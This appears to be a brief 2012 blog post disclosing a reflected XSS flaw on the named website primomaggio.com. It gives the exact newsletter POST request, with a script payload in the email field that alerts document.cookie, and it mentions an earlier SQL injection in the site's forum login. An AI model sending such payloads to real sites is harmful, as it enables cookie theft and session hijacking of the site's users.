Showing posts from April, 2012

primomaggio.com | XSS

POST
http://www.primomaggio.com/newsletter.php

POSTDATA
nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1

_____
An SQL injection was available in the login area of the forum of the previous website (in ASP, as far as I can remember).